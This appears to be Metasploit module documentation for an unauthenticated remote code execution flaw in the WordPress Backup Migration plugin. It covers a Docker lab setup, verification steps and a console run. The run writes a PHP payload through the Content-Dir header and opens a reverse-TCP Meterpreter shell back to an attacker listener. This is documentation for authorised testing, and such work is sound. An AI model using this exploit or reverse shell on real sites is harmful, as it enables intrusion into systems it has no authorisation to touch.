## Vulnerable Application

This module exploits an unauth RCE in the WordPress plugin: Backup Migration (<= 1.3.7).  The vulnerability is
exploitable through the Content-Dir header which is sent to the /wp-content/plugins/backup-backup/includes/backup-heart.php endpoint.

The vuln makes use of a neat technique called PHP Filter Chaining which allows an attacker to prepend
bytes to a string by continuously chaining character encoding conversion. This allows an attacker to prepend
a PHP payload to a string which gets evaluated by a require statement, which results in command execution.

### Setup 

Spin up a Wordpress instance by running `docker-compose up` in the same directory as the `docker-compose.yml` file below:
```
version: "3"
# Defines which compose version to use
services:
  # Services line define which Docker images to run. In this case, it will be MySQL server and WordPress image.
  db:
    image: mysql:5.7
    # image: mysql:5.7 indicates the MySQL database container image from Docker Hub used in this installation.
    restart: always
    environment:
      MYSQL_ROOT_PASSWORD: MyR00tMySQLPa$$5w0rD
      MYSQL_DATABASE: MyWordPressDatabaseName
      MYSQL_USER: MyWordPressUser
      MYSQL_PASSWORD: Pa$$5w0rD
      # Previous four lines define the main variables needed for the MySQL container to work: database, database username, database user password, and the MySQL root password.
  wordpress:
    depends_on:
      - db
    image: wordpress:latest
    restart: always
    # Restart line controls the restart mode, meaning if the container stops running for any reason, it will restart the process immediately.
    ports:
      - "8000:80"
      # The previous line defines the port that the WordPress container will use. After successful installation, the full path will look like this: http://localhost:8000
    environment:
      WORDPRESS_DB_HOST: db:3306
      WORDPRESS_DB_USER: MyWordPressUser
      WORDPRESS_DB_PASSWORD: Pa$$5w0rD
      WORDPRESS_DB_NAME: MyWordPressDatabaseName
# Similar to MySQL image variables, the last four lines define the main variables needed for the WordPress container to work properly with the MySQL container.
    volumes:
      ["./:/var/www/html"]
volumes:
  mysql: {}
```

Download the vulnerable Backup Migration plugin: `https://downloads.wordpress.org/plugin/backup-backup.1.3.7.zip`.
Navigate to `http://localhost:8000` and you'll be redirected and asked to setup the WordPress site. This includes 
setting a username, password, email address for the admin user etc. Once the setup is complete login as the newly created
admin user and via the options on the left side of the screen navigate to the `Plugins` and select `Add New`. Upload the
`backup-backup.1.3.7.zip` file. You should now see `Backup Migration` in the list of Plugins, select `Activate` on the
plugin. You should now have a vulnerable instance running. 

## Verification Steps

1. Start msfconsole
1. Do: `use `
1. Set the `RHOST`, `USERNAME`, and `PASSWORD` options
1. Run the module
1. Receive a Meterpreter session in the context of the user running the WordPress application.

## Scenarios
### Backup Migration Plugin version: 1.3.7 (Containerized WordPress Version 6.0)
```
msf6 exploit(multi/http/wp_backup_migration_php_filter) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf6 exploit(multi/http/wp_backup_migration_php_filter) > set rport 8000
rport => 8000
msf6 exploit(multi/http/wp_backup_migration_php_filter) > set lhost 192.168.123.1
lhost => 192.168.123.1
msf6 exploit(multi/http/wp_backup_migration_php_filter) > options

Module options (exploit/multi/http/wp_backup_migration_php_filter):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   PAYLOAD_FILENAME  ONxu.php         yes       The filename for the payload to be used on the target host (%RAND%.php by default)
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS            127.0.0.1        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT             8000             yes       The target port (TCP)
   SSL               false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI         /                yes       The base path to the wordpress application
   VHOST                              no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.123.1    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/wp_backup_migration_php_filter) > run

[*] Started reverse TCP handler on 192.168.123.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] WordPress Version: 6.0
[+] Detected Backup Migration Plugin version: 1.3.7
[+] The target appears to be vulnerable.
[*] Writing the payload to disk, character by character, please wait...
[*] Sending stage (39927 bytes) to 192.168.123.1
[+] Deleted L
[+] Deleted ONxu.php
[*] Meterpreter session 3 opened (192.168.123.1:4444 -> 192.168.123.1:56224) at 2024-01-11 12:17:34 -0500

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : 856d06702f34
OS          : Linux 856d06702f34 6.5.11-linuxkit #1 SMP PREEMPT_DYNAMIC Wed Dec  6 17:14:50 UTC 2023 x86_64
Meterpreter : php/linux
meterpreter >
```